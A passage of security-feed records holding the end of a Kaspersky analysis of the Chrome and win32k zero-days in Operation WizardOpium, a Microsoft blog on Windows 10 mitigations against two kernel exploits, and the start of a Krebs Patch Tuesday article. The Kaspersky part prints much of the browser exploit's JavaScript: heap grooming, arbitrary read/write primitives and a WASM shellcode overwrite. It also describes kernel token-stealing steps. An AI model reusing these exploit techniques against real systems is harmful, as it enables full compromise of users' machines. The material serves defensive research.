\t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0****, **it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) &amp; 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc _and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation._", "modified": "2020-05-28T10:00:09", "published": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2017-06-30T15:02:20", "bulletinFamily": "blog", "cvelist": ["CVE-2016-7855", "CVE-2016-7256", "CVE-2016-7255"], "description": "Cyberattacks involving zero-day exploits happen from time to time, affecting different platforms and applications. Over the years, Microsoft security teams have been working extremely hard to address these attacks. While delivering innovative solutions like [Windows Defender Application Guard](<https://blogs.windows.com/msedgedev/2016/09/27/application-guard-microsoft-edge>), which provides a safe virtualized layer for the Microsoft Edge browser, and [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>), a cloud-based service that identifies breaches using data from built-in Windows 10 sensors, we are hardening the Windows platform with mitigation techniques that can stop exploits of newly discovered and even undisclosed vulnerabilities. As Terry Myerson reiterated in his [blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), we take our commitment to security innovation very seriously.\n\nA key takeaway from the detonation of zero-day exploits is that each instance represents a valuable opportunity to assess how resilient a platform can be\u2014how mitigation techniques and additional defensive layers can keep cyberattacks at bay while vulnerabilities are being fixed and patches are being deployed. Because it takes time to hunt for vulnerabilities and it is virtually impossible to find all of them, such security enhancements can be critical in preventing attacks based on zero-day exploits.\n\nIn this blog, we look at two recent kernel-level zero-day exploits used by multiple activity groups. These kernel-level exploits, based on CVE-2016-7255 and CVE-2016-7256 vulnerabilities, both result in elevation of privileges. Microsoft has promptly fixed the mentioned vulnerabilities in November 2016. However, we are testing the exploits against mitigation techniques delivered in August 2016 with Windows 10 Anniversary Update, hoping to see how these techniques might fare against future zero-day exploits with similar characteristics.\n\n \n\n**CVE** | **Microsoft Update** | **Exploit Type** | **Mitigation in Anniversary Update** \n---|---|---|--- \nCVE-2016-7255 | [MS16-135 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-135>) | Win32k Elevation of Privilege Exploit | Strong validation of tagWND structure \nCVE-2016-7256 | [MS16-132 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-132>) | Open Type Font Exploit | Isolated Font Parsing (AppContainer) \nStronger validation in font parsing \n \n \n\n## CVE-2016-7255 exploit: Win32k elevation of privilege\n\nIn October 2016, the STRONTIUM attack group launched a spear-phishing campaign targeting a small number of think tanks and nongovernmental organizations in the United States. The campaign, also discussed in [the previously mentioned blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), involved the use of the exploit for CVE-2016-7255 in tandem with an exploit for the Adobe Flash Player vulnerability CVE-2016-7855.\n\nThe attack group used the Flash exploit to take advantage of a use-after-free vulnerability and access targeted computers. They then leveraged the type-confusion vulnerability in _win32k.sys_ (CVE-2016-7255) to gain elevated privileges.\n\n### Abusing the tagWND.strName kernel structure\n\nIn this section, we\u2019ll go through the internals of the specific exploit for CVE-2016-7255 crafted by the attacker. We will show how mitigation techniques provided customers with preemptive protection from the exploit, even before the release of the specific update fixing the vulnerability.\n\n\n\n_Figure 1. Exploit and shellcode phases of this attack _\n\n \n\nModern exploits often rely on read-write (RW) primitives to achieve code execution or gain additional privileges. For this exploit, attackers acquire RW primitives by corrupting _tagWND.strName_ kernel structure. This exploit method is a trend discussed in security conferences and visible to those who investigated actual attacks. For example, we detailed similar findings in a [presentation](<https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/OhFlorio-VB2015.pdf>) about the Duqu 2.0 exploit at Virus Bulletin 2015.\n\nBy reverse engineering its code, we found that the Win32k exploit used by STRONTIUM in October 2016 reused the exact same method. The exploit, after the initial Win32k vulnerability, corrupts _tagWND.strName_ structure and uses _SetWindowTextW_ to write arbitrary content anywhere in kernel memory.\n\n\n\n_Figure 2. SetWindowTextW as a write primitive_\n\n \n\nThe exploit abuses this API call to overwrite data of current processes and copy token privileges of the _SYSTEM_. If successful, the exploit enables the victim process\u2014_iexplore.exe_, in this example\u2014to execute with elevated privileges.\n\n\n\n_Figure 3. Internet Explorer with SYSTEM privileges_\n\n \n\n### Mitigating tagWND exploits with stronger validation\n\nTo mitigate the Win32k exploit and similar exploits, the Windows Offensive Security Research Team (OSR) introduced techniques in the Windows 10 Anniversary Update that prevent abusive use of _tagWND.strName_. This mitigation performs additional checks for the base and length fields, making sure that they are in the expected virtual address ranges and are not usable for RW primitives. In our tests on Anniversary Update, exploits using this method to create an RW primitive in the kernel are ineffective. These exploits instead cause exceptions and subsequent blue screen errors.\n\n\n\n_Figure 4. Windows 10 Anniversary Update mitigation on a common kernel write primitive_\n\n \n\nWith the upcoming Windows 10 Creators Update, [Windows Defender ATP](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>) introduces numerous forms of generic kernel exploit detection for deeper visibility into targeted attacks leveraging zero-day exploits. Technical details about the enhanced sensor will be shared in a forthcoming blog post.\n\n## CVE-2016-7256 exploit: Open type font elevation of privilege\n\nAs early as June 2016, unidentified actors began to use an implant detected as \u201cHenkray\u201d in low-volume attacks primarily focused on targets in South Korea. Later, in November 2016, these attackers were detected exploiting a flaw in the Windows font library (CVE-2016-7256) to elevate privileges and install the Henkray backdoor on targeted computers with older versions of Windows.\n\nThe font samples found on affected computers were specifically manipulated with hardcoded addresses and data to reflect actual kernel memory layouts. This indicates the likelihood that a secondary tool dynamically generated the exploit code at the time of infiltration.\n\n\n\n_Figure 5. Auto-generation of font file with exploit_\n\n \n\nThis secondary executable or script tool, which has not been recovered, appears to prepare and drop the font exploit, calculating and preparing the hardcoded offsets needed to exploit the kernel API and the kernel structures on the targeted system. Through deep forensic inspection of the binary data found in samples, we extracted all the hardcoded offsets and ascertained the kernel version targeted by this exploit: Windows 8 64-bit.\n\n### Function table corruption for initial code execution\n\nThe font exploit uses _fa_Callbacks_ to corrupt the function table and achieve initial code execution. The callback is called from the CFF parsing function. The following snippet shows a corrupted _ftell_ pointer to a _nt!qsort+0x39_ location in kernel code.\n\n\n\n_Figure 6. fa_Callbacks table corruption_\n\n \n\nThe following snippet shows the code that calls the corrupt function pointer leading to a kernel ROP chain.\n\n\n\n_Figure 7. fa_Callbacks.ftell function call code_\n\n \n\nWhen the corrupted function is called, the control jumps to the first ROP gadget at nt!qsort+0x39, which adjusts stack pointer and initializes some register values from stack values.\n\n\n\n_Figure 8. First ROP gadget_\n\n \n\nAfter the first gadget, the stack points to a kernel ROP chain which calls to _ExAllocatePoolWithTag_ call to reserve shellcode memory. Another ROP gadget will copy the first 8 bytes of the stage 1 shellcode to the allocated memory.\n\n\n\n_Figure 9. Copying the stage 1 shellcode_\n\n \n\n### Shellcode and privilege escalation\n\nThe stage 1 shellcode is very small. Its main function is to copy the main body of the shellcode to newly allocated memory and run them with a JMP RAX control transfer.\n\n\n\n_Figure 10. Stage 1 shellcode_\n\n \n\nThe main shellcode runs after the copy instructions. The main shellcode\u2014also a small piece of code\u2014performs a well-known token-stealing technique. It then copies the token pointer from a SYSTEM process to the target process, achieving privilege escalation. Both the SYSTEM process and target process PIDs, as well as certain offsets for the kernel APIs needed by the shellcode, are hardcoded in the font sample.\n\n\n\n_Figure 11. Token replacement technique_\n\n \n\n### Mitigating font exploits with AppContainer\n\nWhen opening the malicious font sample on Windows 10 Anniversary Update, font parsing happens completely in AppContainer instead of the kernel. AppContainer provides an isolated sandbox that effectively prevents font exploits (among other types of exploits) from gaining escalated privileges. The isolated sandbox considerably reduces font parsing as an attack surface.\n\n\n\n_Figure 12. AppContainer protects against untrusted fonts in Windows 10 Anniversary Update_\n\n \n\nWindows 10 Anniversary Update also includes additional validation for font file parsing. In our tests, the specific exploit code for CVE-2016-7256 simply fails these checks and is unable to reach vulnerable code.\n\n\n\n_Figure 13. Windows 10 font viewer error_\n\n \n\n## Conclusion: Fighting the good fight with exploit mitigation and layered detection\n\nWhile fixing a single-point vulnerability helps neutralize a specific bug, Microsoft security teams continue to look into opportunities to introduce more and more mitigation techniques. Such mitigation techniques can break exploit methods, providing a medium-term tactical benefit, or close entire classes of vulnerabilities for long-term strategic impact.\n\nIn this article, we looked into recent attack campaigns involving two zero-day kernel exploits. We saw how exploit mitigation techniques in Windows 10 Anniversary Update, which was released months before these zero-day attacks, managed to neutralize not only the specific exploits but also their exploit methods. As a result, these mitigation techniques are significantly reducing attack surfaces that would have been available to future zero-day exploits.\n\nBy delivering these mitigation techniques, we are increasing the cost of exploit development, forcing attackers to find ways around new defense layers. Even the simple tactical mitigation against popular RW primitives forces the exploit authors to spend more time and resources in finding new attack routes. By moving font parsing code to an isolated container, we significantly reduce the likelihood that font bugs are used as vectors for privilege escalation.\n\nIn addition to the techniques mentioned in this article, Windows 10 Anniversary Update introduced [many other mitigation techniques](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) in core Windows components and the Microsoft Edge browser, helping protect customers from entire classes of exploits for very recent and even undisclosed vulnerabilities.\n\nFor effective post-breach detection, including cover for the multiple stages of attacks described in this blog post, sign up for Window Defender ATP. The service leverages built-in sensors to raise alerts for exploits and other attack activity, providing corresponding threat intelligence. Customers interested in the Windows Defender ATP post-breach detection solution can find more information [here](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>).\n\n_Microsoft would like to thank [KrCERT](<https://www.krcert.or.kr/>) for their collaboration in protecting customers and for providing the sample for CVE-2016-7256._\n\n \n\n_Matt Oh and Elia Florio, __Windows Defender ATP Research Team_\n\n \n\n_Updates:_\n\nJan 18, 2017 - Corrected the spelling of Henkray backdoor.", "modified": "2017-01-13T21:28:49", "published": "2017-01-13T21:28:49", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/", "id": "MMPC:11F96360F6FFA25D4AC7028A2E9CAA9D", "title": "Hardening Windows 10 with zero-day exploit mitigations", "type": "mmpc", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "krebs": [{"lastseen": "2021-02-10T00:29:38", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472", "CVE-2021-1732", "CVE-2021-21148", "CVE-2021-24078"], "description": "**Microsoft** today rolled out updates to plug at least 56 security holes in its **Windows** operating systems and other software. One of the bugs is already being actively exploited, and six of them were publicized prior to today, potentially giving attackers a head start in figuring out how to exploit the flaws.\n\n\n\nNine of the 56 vulnerabilities earned Microsoft&#x27;s most urgent &quot;critical&quot; rating, meaning malware or miscreants could use them to seize remote control over unpatched systems with little or no help from users.\n\nThe flaw being exploited in the wild already -- [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732>) -- affects Windows 10, Server 2016 and later editions. It received a slightly less dire &quot;important&quot; rating and mainly because it is a vulnerability that lets an attacker increase their authority and control on a device, which means the attacker needs to already have access to the target system.\n\nTwo of the other bugs that were disclosed prior to this week are critical and reside in **Microsoft&#x27;s .NET Framework**, a component required by many third-party applications (most Windows users will have some version of .NET installed).\n\nWindows 10 users should note that while the operating system installs all monthly patch roll-ups in one go, that rollup does not typically include .NET updates, which are installed on their own. So when you&#x27;ve backed up your system and installed this month&#x27;s patches, you may want to check Windows Update again to see if there are any .NET updates pending.\n\nA key concern for enterprises is another critical bug in the DNS server on Windows Server 2008 through 2019 versions that could be used to remotely install software of the attacker&#x27;s choice. [CVE-2021-24078](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24078>) earned [a CVSS Score](<https://nvd.nist.gov/vuln-metrics/cvss>) of 9.8, which is about as dangerous as they come.\n\n**Recorded Future** says this vulnerability can be exploited remotely by getting a vulnerable DNS server to query for a domain it has not seen before (e.g. by sending a phishing email with a link to a new domain or even with images embedded that call out to a new domain). **Kevin Breen** of **Immersive Labs** notes that CVE-2021-24078 could let an attacker steal loads of data by altering the destination for an organization&#x27;s web traffic -- such as pointing internal appliances or Outlook email access at a malicious server.\n\nWindows Server users also should be aware that Microsoft this month is enforcing the second round of security improvements as part of a two-phase update to address [CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>), a severe vulnerability that [first saw active exploitation back in September 2020](<https://krebsonsecurity.com/2020/09/microsoft-attackers-exploiting-zerologon-windows-flaw/>).\n\nThe vulnerability, dubbed &quot;**Zerologon**,&quot; is a bug in the core &quot;**Netlogon**&quot; component of Windows Server devices. The flaw lets an unauthenticated attacker gain administrative access to a Windows domain controller and run any application at will. A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\nMicrosoft&#x27;s [initial patch for CVE-2020-1472](<https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/>) fixed the flaw on Windows Server systems, but did nothing to stop unsupported or third-party devices from talking to domain controllers using the insecure Netlogon communications method. Microsoft said it chose this two-step approach &quot;to ensure vendors of non-compliant implementations can provide customers with updates.&quot; With this month&#x27;s patches, Microsoft will begin rejecting insecure Netlogon attempts from non-Windows devices.\n\nA couple of other, 